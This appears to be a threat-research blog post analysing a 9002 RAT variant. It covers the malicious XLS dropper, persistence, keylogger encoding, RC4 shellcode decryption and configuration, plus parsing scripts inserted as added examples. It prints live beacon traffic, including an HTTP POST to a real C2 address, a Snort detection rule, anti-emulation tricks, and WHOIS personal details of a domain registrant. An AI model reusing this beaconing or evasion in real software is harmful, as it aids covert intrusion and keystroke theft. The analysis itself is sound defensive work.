Another 9002 Trojan Variant

After investigating a newer malicious XLS document, presumably targeted at a Chinese national, I noticed some oddly familiar network traffic produced by the backdoor it dropped. Based on its command-and-control traffic it was very clearly a variant of the 9002 RAT. The 9002 RAT first achieved notoriety back in 2009 in relation to the Operation Aurora attacks, and again more recently last year in FireEye’s blog posts about the Sunshop Campaign.

However, the RAT itself is relatively uninteresting: beyond basic backdoor capabilities it essentially serves as a platform to download and execute additional DLLs. The part that first struck me this time was the persistence method; it used a standard Run key to call an export from the backdoor via rundll32. This is fairly typical of a DLL backdoor, but when disassembled the called export appeared to be nothing more than an infinite loop around the Sleep function. Somehow the malicious routines in the backdoor would still start and it would begin beaconing, so I decided to look a little deeper.

Technical Details

The document itself exploited the oldie-but-goodie CVE-2012-0158. The title of the document roughly translated to “Two accounted for in the peace process table”.


Document Details:
MD5: 5E9EBB626F8483ABEB279F3CF90441ED
File Size: 333,824 Bytes


The document contained another encoded document within its body beginning at offset 0xBE00, as well as an encoded executable beginning at offset 0x10C00. Both were encoded using the same scheme: a single-byte XOR against the byte 0x9C and a rotate-right (ROR) of each byte by 3. The inner document is what would be shown to a potential victim upon successful exploitation and was saved as “%temp%\~tmp.xls”. The outer document’s metadata was stripped from the file; however, the inner document retained a last-save date of March 11, 2014 at 1:05 AM PST.


The dropper was signed with a valid certificate belonging to “A’digm Inc.” and was written to “C:\RECYCLER\bmp{hex digit}.tmp”, where “hex digit” is a randomly generated hexadecimal digit.


Dropper Details:
MD5: 33FC96A418AB7698DDBA97F240408B3B
File Size: 265,200 Bytes
Compile Time: 12/16/2013 03:08:29 UTC


Dropper Certificate Details:
Serial Number: 45 6E 96 7A 81 5A A5 CB B9 9F B8 6A CA 8F 7F 69
Thumb Print: 91 24 87 EC CF 3E 76 82 06 9E E4 F2 B8 2F 25 21 B0 BD 3B 1C
Validity: December 30, 2012 5:00 PM – January 30, 2015 4:59:59 PM
Subject:
CN: A’digm, Inc.
O: A’digm, Inc.
L: Gangnam-gu
S: Seoul
C: KR


Backdoor Details:
MD5: 863A5521633B735185850222363CF853
File Size: 144,968 Bytes
Compile Time: 12/09/2013 05:48:37 UTC


When executed, the dropper decodes the backdoor from a resource named “RES” within its body and writes the decoded backdoor to the file “%CommonProgramFiles%\ODBC\Mshype.dll”. The backdoor was also signed with the same certificate belonging to “A’digm Inc.”, on December 9, 2013 at 05:49:18 UTC. The dropper created several registry keys, including a Run key to establish persistence on the victim machine.


Registry Changes:

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First

• HKCU\Software\Transpan\RunPath -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First

• HKCU\Software\TransPan\mshtm -> plain text configuration data (0x1F8 Bytes)


Persistence Mechanism:

• Run Key in the victim user’s registry hive:

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 which will call an export from the backdoor “Mshype.dll” via rundll32.exe


File System Changes:

• %temp%\~tmp.xls

• C:\RECYCLER\bmp{Hex Character(s)}.tmp

• %CommonProgramFiles%\ODBC\Mshype.dll

• %CommonProgramFiles%\ODBC\temp_k.ax (Stored Keystrokes)

• May Create %temp%\{hostname}_p.ax

• May Create %temp%\uid.ax

• May Create %CommonProgramFiles%\ODBC\temp_plugin.ax

• May Create %UserProfile%\AppData\Roaming\Microsoft\mscmos.ini (Vista+)

• May Create %UserProfile%\AppData\Roaming\Microsoft\temp_plugin.ax (Vista+)

• May Create %UserProfile%\AppData\Roaming\temp_k.ax (Vista+)


Volatile Evidence:

Creates the mutex “QPONMLKJIH”

Creates the mutex DirectInput.{89521361-AA8A-11CF-BFC7-444553540000}

Creates the mutex DirectInput.{5944E682-C92E-11CF-BFC7-444553540000}


What immediately struck me as odd about the backdoor was that the persistence mechanism called the exported function “Process32First”, which when disassembled does nothing more than sleep for five seconds in an infinite loop. Somehow, though, the sample would still begin to beacon out. I spent a few hours puzzling over this one before coming to the realization that when rundll32.exe uses the LoadLibraryW function to load “Mshype.dll” into its address space, the DLL’s DllMain function is called.

The DllMain function in turn contains a subroutine that calls CreateThread with a start address of 0x10001022. This thread intentionally raises a non-continuable exception using a standard API call to RaiseException; the exception handler then starts a new thread beginning at 0x1000105B, which contains the beginning of the decryption routines for the actual backdoor. My current guess is that the structured exception handling is there to bypass some common emulation engines used in malware analysis; unsurprisingly, this sample has a current detection rate of two.

The 9002 variant still uses an intermediary stage of self-modifying shellcode before getting to the actual unencrypted code, although the standard encryption mechanism has been significantly altered to use RC4 with the key “0123456789” instead of a single-byte XOR. The first stage is stored at file offset 0xF040 and can be decoded using the Python script below.


from Crypto.Cipher import ARC4   # PyCryptodome (pip install pycryptodome)
import sys

# Usage: python <this script> <first-stage blob carved from file offset 0xF040>
with open(sys.argv[1], 'rb') as infile:
    binary = infile.read()

key = b'0123456789'              # RC4 key hard-coded by this variant (bytes, not str)
rc4 = ARC4.new(key)
decrypted = rc4.decrypt(binary)  # RC4 is symmetric: decrypt == encrypt

# Write the decrypted stage next to the input; errors are left visible, not swallowed
with open(sys.argv[1] + '.dec', 'wb') as outfile:
    outfile.write(decrypted)

Figure 1: Python Script to Decrypt the First-Stage Shellcode

The backdoor also included a DLL module inside its body that is loaded and run once decrypted. This DLL was designed to log keystrokes and other activity to the file “%CommonProgramFiles%\ODBC\temp_k.ax” or “%UserProfile%\AppData\Roaming\temp_k.ax”, depending on the operating system. The keylogger itself was relatively uninteresting except for its use of DINPUT8.dll, a DirectX module more commonly responsible for providing joystick, mouse, keyboard, and other controller interfaces. This DirectX 8 interface gives the keylogger more granularity in determining exactly what activity occurred on the system. Keystrokes were stored as Unicode text encoded with a simple one-byte XOR against the byte 0x56.


00000000   0D 56 01 56 1F 56 18 56  0B 56 5B 56 5C 56 2A 56   .V.V.V.V.V[V\V*V
00000010   2A 56 01 56 3F 56 38 56  32 56 39 56 21 56 25 56   *V.V?V8V2V9V!V%V
00000020   76 56 02 56 3F 56 22 56  3A 56 33 56 6C 56 76 56   vV.V?V"V:V3VlVvV
00000030   19 56 26 56 33 56 38 56  76 56 10 56 3F 56 3A 56   .V&V3V8VvV.V?V:V
00000040   33 56 25 56 76 56 2A 56  2A 56 64 56 66 56 67 56   3V%VvV*V*VdVfVgV
00000050   62 56 79 56 66 56 62 56  79 56 67 56 61 56 76 56   bVyVfVbVyVgVaVvV
00000060   67 56 62 56 6C 56 67 56  60 56 6C 56 65 56 63 56   gVbVlVgV`VlVeVcV
00000070   5B 56 5C 56 2A 56 2A 56  32 56 23 56 3B 56 26 56   [V\V*V*V2V#V;V&V
00000080   5B 56 5C 56 2A 56 2A 56  01 56 3F 56 38 56 32 56   [V\V*V*V.V?V8V2V
00000090   39 56 21 56 25 56 76 56  02 56 3F 56 22 56 3A 56   9V!V%VvV.V?V"V:V
000000A0   33 56 6C 56 76 56 01 56  3F 56 38 56 1E 56 33 56   3VlVvV.V?V8V.V3V
000000B0   2E 56 76 56 7B 56 76 56  0D 56 32 56 23 56 3B 56   .VvV{VvV.V2V#V;V
000000C0   26 56 33 56 32 56 78 56  32 56 3A 56 3A 56 0B 56   &V3V2VxV2V:V:V.V
000000D0   76 56 2A 56 2A 56 64 56  66 56 67 56 62 56 79 56   vV*V*VdVfVgVbVyV
000000E0   66 56 62 56 79 56 67 56  61 56 76 56 67 56 62 56   fVbVyVgVaVvVgVbV
000000F0   6C 56 67 56 60 56 6C 56  65 56 63 56 5B 56 5C 56   lVgV`VlVeVcV[V\V
00000100   2A 56 2A 56 6A 56 13 56  18 56 02 56 13 56 04 56   *V*VjV.V.V.V.V.V
00000110   68 56 5B 56 5C 56                                 hV[V\V

Figure 2: Example Encoded Activity from “temp_k.ax”

00000000   5B 00 57 00 49 00 4E 00  5D 00 0D 00 0A 00 7C 00   [.W.I.N.].....|.
00000010   7C 00 57 00 69 00 6E 00  64 00 6F 00 77 00 73 00   |.W.i.n.d.o.w.s.
00000020   20 00 54 00 69 00 74 00  6C 00 65 00 3A 00 20 00    .T.i.t.l.e.:. .
00000030   4F 00 70 00 65 00 6E 00  20 00 46 00 69 00 6C 00   O.p.e.n. .F.i.l.
00000040   65 00 73 00 20 00 7C 00  7C 00 32 00 30 00 31 00   e.s. .|.|.2.0.1.
00000050   34 00 2F 00 30 00 34 00  2F 00 31 00 37 00 20 00   4./.0.4./.1.7. .
00000060   31 00 34 00 3A 00 31 00  36 00 3A 00 33 00 35 00   1.4.:.1.6.:.3.5.
00000070   0D 00 0A 00 7C 00 7C 00  64 00 75 00 6D 00 70 00   ....|.|.d.u.m.p.
00000080   0D 00 0A 00 7C 00 7C 00  57 00 69 00 6E 00 64 00   ....|.|.W.i.n.d.
00000090   6F 00 77 00 73 00 20 00  54 00 69 00 74 00 6C 00   o.w.s. .T.i.t.l.
000000A0   65 00 3A 00 20 00 57 00  69 00 6E 00 48 00 65 00   e.:. .W.i.n.H.e.
000000B0   78 00 20 00 2D 00 20 00  5B 00 64 00 75 00 6D 00   x. .-. .[.d.u.m.
000000C0   70 00 65 00 64 00 2E 00  64 00 6C 00 6C 00 5D 00   p.e.d...d.l.l.].
000000D0   20 00 7C 00 7C 00 32 00  30 00 31 00 34 00 2F 00    .|.|.2.0.1.4./.
000000E0   30 00 34 00 2F 00 31 00  37 00 20 00 31 00 34 00   0.4./.1.7. .1.4.
000000F0   3A 00 31 00 36 00 3A 00  33 00 35 00 0D 00 0A 00   :.1.6.:.3.5.....
00000100   7C 00 7C 00 3C 00 45 00  4E 00 54 00 45 00 52 00   |.|.<.E.N.T.E.R.
00000110   3E 00 0D 00 0A 00                                 >.....
Figure 3: Decoded Activity from “temp_k.ax”
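An added example (not code from the original post) that reverses the encoding described above: it XORs a temp_k.ax blob with 0x56 and decodes the result as UTF-16LE, and includes a triage check based on the fact that the high byte of every ASCII-range character comes out as 0x56. The sample input is the first 16 bytes of Figure 2; the function names are this example's own.

```python
KEYLOG_XOR_KEY = 0x56

# Constructed sample: the first 16 bytes of Figure 2, copied from the hex dump.
SAMPLE_ENCODED = bytes.fromhex("0D 56 01 56 1F 56 18 56 0B 56 5B 56 5C 56 2A 56")


def decode_keylog(blob: bytes, key: int = KEYLOG_XOR_KEY) -> str:
    """XOR every byte with the key, then decode the result as UTF-16LE.

    Each ASCII-range character is a two-byte code unit whose high byte is
    0x00, so in the encoded file every second byte is 0x00 ^ 0x56 == 0x56:
    the "xV.V" pattern visible in Figure 2.
    """
    decoded = bytes(b ^ key for b in blob)
    if len(decoded) % 2:          # a dangling odd byte is not a full code unit
        decoded = decoded[:-1]
    return decoded.decode("utf-16-le", errors="replace")


def looks_like_keylog(blob: bytes, key: int = KEYLOG_XOR_KEY, min_units: int = 8) -> bool:
    """Triage heuristic: nearly every high byte equals the key for ASCII-range text.

    Non-ASCII keystrokes (e.g. CJK characters) have non-zero high bytes and
    lower the ratio, so the 90% threshold is a starting point, not a rule.
    """
    high_bytes = blob[1::2]
    if len(high_bytes) < min_units:
        return False
    return sum(1 for b in high_bytes if b == key) / len(high_bytes) >= 0.9


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ENCODED
    if looks_like_keylog(data):
        print(decode_keylog(data))
```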
Keylogger Details (In Memory Only):
MD5: 901C45A594B9FC9CB27723B7CE430235
File Size: 69,120 Bytes
Compile Time: 12/09/2013 05:41:33 UTC


This is probably the first of a number of variants to come. A copious number of debug statements were left in the code and can be viewed using something like Sysinternals’ DebugView.

Network Traffic Details and Detection

After the second stage is decrypted in memory, the backdoor uses the configuration data stored in plain text in “HKCU\Software\TransPan\mshtm” and beacons to “180.169.28.58” on port 1080.


00000000   30 30 30 30 30 30 30 30  00 00 00 00 00 00 00 00   00000000........
00000010   44 65 66 61 75 6C 74 00  00 00 00 00 00 00 00 00   Default.........
00000020   31 38 30 2E 31 36 39 2E  32 38 2E 35 38 00 00 00   180.169.28.58...
00000030   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000050   00 00 00 00 38 04 00 00  67 00 6F 00 6F 00 64 00   ....8...g.o.o.d.
00000060   6E 00 65 00 77 00 73 00  70 00 61 00 70 00 65 00   n.e.w.s.p.a.p.e.
00000070   72 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   r...............
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 38 04 00 00   ............8...
000000C0   14 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000120   00 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00   ................
00000130   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000140   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000150   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000160   00 00 00 00 38 04 00 00  00 00 00 00 00 00 00 00   ....8...........
00000170   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000180   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000190   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001D0   00 00 00 00 00 00 00 00  76 32 2E 38 00 00 00 00   ........v2.8....
000001E0   00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00   ................
000001F0   FF FF FF FF FF FF FF FF                           ÿÿÿÿÿÿÿÿ

Figure 4: Configuration Data Stored in "mshtm" Registry Key
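An added example (not code from the original post) that pulls the readable fields out of the 0x1F8-byte mshtm blob at the offsets visible in Figure 4, so the same extraction can be run against the registry value on another host. The field names ("id", "group", "tag") are this example's guesses from the dump, not names the malware uses; only the host, the port (0x438 = 1080) and the blob size are confirmed by the post, and the sample blob is rebuilt here from the figure.

```python
import struct

CONFIG_LEN = 0x1F8  # 504 bytes, the size of the mshtm value noted above


def build_sample_config() -> bytes:
    """Constructed sample: the non-zero fields of Figure 4 at the offsets shown there."""
    cfg = bytearray(CONFIG_LEN)
    cfg[0x00:0x08] = b"00000000"
    cfg[0x10:0x17] = b"Default"
    cfg[0x20:0x2D] = b"180.169.28.58"
    struct.pack_into("<I", cfg, 0x54, 1080)          # 38 04 00 00 little-endian
    cfg[0x58:0x72] = "goodnewspaper".encode("utf-16-le")
    struct.pack_into("<I", cfg, 0xBC, 1080)
    struct.pack_into("<I", cfg, 0xC0, 0x14)
    struct.pack_into("<I", cfg, 0x12C, 2)
    struct.pack_into("<I", cfg, 0x164, 1080)
    cfg[0x1D8:0x1DC] = b"v2.8"
    struct.pack_into("<I", cfg, 0x1E8, 1)
    cfg[0x1F0:0x1F8] = b"\xFF" * 8
    return bytes(cfg)


def _cstr(buf: bytes, off: int, size: int) -> str:
    """NUL-terminated ASCII field of at most `size` bytes."""
    return buf[off:off + size].split(b"\x00", 1)[0].decode("ascii", "replace")


def _wstr(buf: bytes, off: int, size: int) -> str:
    """NUL-terminated UTF-16LE field; `size` is in bytes and must be even."""
    return buf[off:off + size].decode("utf-16-le", "replace").split("\x00", 1)[0]


def parse_mshtm_config(blob: bytes) -> dict:
    """Extract the readable fields of a mshtm blob (field names are guesses)."""
    if len(blob) != CONFIG_LEN:
        raise ValueError(f"expected {CONFIG_LEN} bytes, got {len(blob)}")
    return {
        "id": _cstr(blob, 0x00, 0x10),
        "group": _cstr(blob, 0x10, 0x10),
        "c2_host": _cstr(blob, 0x20, 0x34),
        "c2_port": struct.unpack_from("<I", blob, 0x54)[0],  # 1080 in the sample
        "tag": _wstr(blob, 0x58, 0x64),
        "version": _cstr(blob, 0x1D8, 0x10),
    }
```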

Two sample beacon packets are shown in the figures below:

00000000   33 31 30 32 0C 00 00 00  08 00 00 00 19 FF FF FF   3102.........ÿÿÿ
00000010   FF 00 00 00 00 11 00 00                           ÿ.......

Figure 5: Sample Beacon Packet

The first beacon always begins with the string “3102”. The next four bytes are the encoded payload size and the following four bytes are the decoded payload size. The payload data is still compressed using the LZO compression library. The second beacon uses a similar protocol wrapped in base64 and sent within HTTP POST requests.
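An added example (not code from the original post) that parses the beacon framing just described and applies the detection the post recommends later, a POST whose User-Agent is "lynx", to a raw HTTP request. The TCP sample is the 24 bytes of Figure 5; the HTTP sample is the POST shown below with a placeholder hex path, and its two-byte body "AA" is shown not to decode to a complete frame.

```python
import base64
import struct

BEACON_MAGIC = b"3102"
HEADER_LEN = 12  # 4-byte magic, 4-byte encoded size, 4-byte decoded size

# Constructed sample: the 24 bytes of Figure 5, copied from the hex dump.
SAMPLE_BEACON = bytes.fromhex(
    "33 31 30 32 0C 00 00 00 08 00 00 00 19 FF FF FF FF 00 00 00 00 11 00 00"
)
# Constructed sample: the POST from the post; the hex path is a placeholder.
SAMPLE_POST = (
    b"POST /0123abcd HTTP/1.1\r\nUser-Agent: lynx\r\nHost: 180.169.28.58:1080\r\n"
    b"Content-Length: 2\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nAA"
)


def parse_beacon(frame: bytes):
    """Return (encoded_len, decoded_len, payload) for a 9002 frame, else None."""
    # Sizes are little-endian; the payload stays LZO-compressed on the wire,
    # so decoded_len is its size after decompression, not its length here.
    if len(frame) < HEADER_LEN or frame[:4] != BEACON_MAGIC:
        return None
    enc_len, dec_len = struct.unpack_from("<II", frame, 4)
    payload = frame[HEADER_LEN:HEADER_LEN + enc_len]
    if len(payload) != enc_len:
        return None  # truncated or mis-framed: not a complete beacon
    return enc_len, dec_len, payload


def split_http_request(raw: bytes):
    """Split a raw request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def is_lynx_post(raw: bytes) -> bool:
    """The post's recommended check: a POST whose User-Agent is exactly 'lynx'."""
    method, _, headers, _ = split_http_request(raw)
    return method == b"POST" and headers.get(b"user-agent", b"").lower() == b"lynx"


def http_beacon_frame(raw: bytes):
    """Base64-decode a POST body (missing padding tolerated) and try to frame it."""
    body = split_http_request(raw)[3].strip()
    decoded = base64.b64decode(body + b"=" * (-len(body) % 4))
    return parse_beacon(decoded)
```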


POST /{Hex Number} HTTP/1.1
User-Agent: lynx
Host: 180.169.28.58:1080
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache

AA


It may also beacon using an HTTP CONNECT request; however, this behavior was not observed in testing. The User-Agent used in communication makes these requests incredibly distinct and easy to detect, as not many people, even neckbeards, use the command-line browser lynx. Once decrypted in memory, the backdoor also appears to contain an old configuration block, or perhaps a backup configuration block, with a version number of 1.0; however, no activity was observed going to the address in it. The old configuration block pointed to “www.aestheticismwoods.com:443”; “www.aestheticismwoods.com” currently resolves to “202.55.5.177” and was first registered in May of 2010 using the email address “xutongshen_fj@hotmail.com”.

WHOIS Information for aestheticismwoods.com

Registrant Name: huangmeng
Registrant Organization: huang meng
Registrant Street: shanghai zhangheng
Registrant City: shanghai
Registrant State/Province: SH
Registrant Postal Code: 201204
Registrant Country: CN
Registrant Phone: +86.2161016550
Registrant Phone Ext: 0
Registrant Fax: +86.2161016551
Registrant Email: xutongshen_fj@hotmail.com

It’s clear that simple changes in protocol headers are much easier to make than rewriting the network protocol itself. Despite FireEye’s suggestion of using the trailing 20 bytes to build a network signature for the initial beacon, the rules proposed in Emerging Threats still use the full 24 bytes. Similarly, for the second type of HTTP traffic the signature below exists:


alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Possible Trojan.APT.9002 POST"; flow:established,to_server; content:"POST "; depth:5; pcre:"/^POST\s+\/[a-f0-9]+\s/U"; content:!"|0d 0a|Referer|3a|"; distance:0; content:"User-Agent|3a 20|lynx|0d 0a|"; distance:0; reference:url,www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html; classtype:trojan-activity; sid:2017702; rev:2;)


It looks for an unnecessary number of additional headers and would not fire on this particular variant. I’d recommend just looking for POST requests with a User-Agent of “lynx”; if people are posting content to the Internet with lynx you probably want to look at it anyway (make sure to use the “tag” feature).  I’m sure more simple header changes are in the future since that seems to be all it takes to bypass current network-monitoring devices and the present state of the security mindset. In the same vein, attackers are continuing to move back towards more traditional and other custom small encryption algorithms as the industry slowly begins to detect more XOR’d content. Attackers wouldn’t use these kinds of simple tweaks if they didn’t continue to work so effectively.